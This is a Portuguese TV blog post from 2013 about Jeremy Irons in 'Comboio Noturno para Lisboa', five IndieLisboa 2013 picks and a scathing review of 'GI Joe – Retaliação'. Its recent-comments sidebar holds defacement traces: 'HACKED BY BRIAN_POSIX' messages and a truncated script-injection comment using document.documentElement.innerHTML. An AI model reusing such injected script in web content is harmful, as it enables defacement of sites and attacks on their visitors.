Sala de Cinema @ 18:31

Ter, 26/03/13

O ator vencedor do Óscar esteve em Lisboa para a apresentação de “Comboio Noturno para Lisboa”, de Bille August, já em exibição. Um projeto franco-alemão com dinheiro também português. A adaptação do famoso bestseller de Pascal Mercier.

Uma história de um professor suíço que chega a Portugal depois de achar acidentalmente um romance escrito por Amadeu, um jovem médico que foi uma figura fulcral na luta contra a ditadura fascista portuguesa nos anos 70. Uma interpretação de Jeremy Irons que vai dividir opiniões. Na Sala de Cinema, o ator confessou a Rui Pedro Tendinha ser fã da luz de Lisboa e até falou ainda da crise económica portuguesa.

 

O IndieLisboa 2013 começa já no próximo dia 18 de Abril e vai até 28. Deixamos aqui cinco apostas da Sala de Cinema de um festival que este ano celebra 10 anos e que muda o figurino: menos retrospetivas e uma nova direção, desta vez sem a presença de Rui Pereira.

- “Um Fim do Mundo”, de Pedro Pinho.
Um drama no limite do real sobre adolescentes da Bela Vista, o mais problemático dos bairros sociais de Setúbal. Esteve no festival de Berlim.

- “Paradise-Love”, de Urlich Seidl.
Primeira parte de uma trilogia deste cineasta austríaco. Este primeiro tomo conta-nos a história de uma senhora austríaca que decide arriscar e fazer umas férias sexuais num país africano.

- “É o Amor”, de João Canijo.
Depois de já ter tido a sua antestreia em Vila do Conde, este cruzamento entre ficção e documentário leva-nos até ao dia-a-dia de uma comunidade de pescadores nas Caxinas, Vila do Conde. Estreia logo a seguir no circuito comercial.

- “Before Midnight”, de Ricard Linklater.
Julie Delpy e Ethan Hawke voltam a protagonizar a história de um casal separado por um continente. Depois de “Antes de Anoitecer” e “Antes do Amanhecer”, o capítulo final deste romance passa-se na Grécia.

- “No”, de Pablo Larrain.
O cinema chileno tem honras de abertura do festival. Gael Garcia Bernal é o homem que manipulou uma campanha anti-ditadura de Pinochet em plenos anos 80.

 

Poupe dinheiro
“GI Joe – Retaliação”, de Jon Chu (ZON), estreia quinta-feira.
Bruce Willis e Dwayne Johnson são as estrelas maiores desta sequela de G.I. JOE. Agora percebe-se porque razão esteve na gaveta um ano. Um dos piores filmes de ação da História de Hollywood. Um insulto ao espetador, onde a comédia surge de forma involuntária.

 

Não perca esta quarta-feira, às 17:30 na SIC MUlher!

 

E se não viu. Veja o vídeo aqui!

 





Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO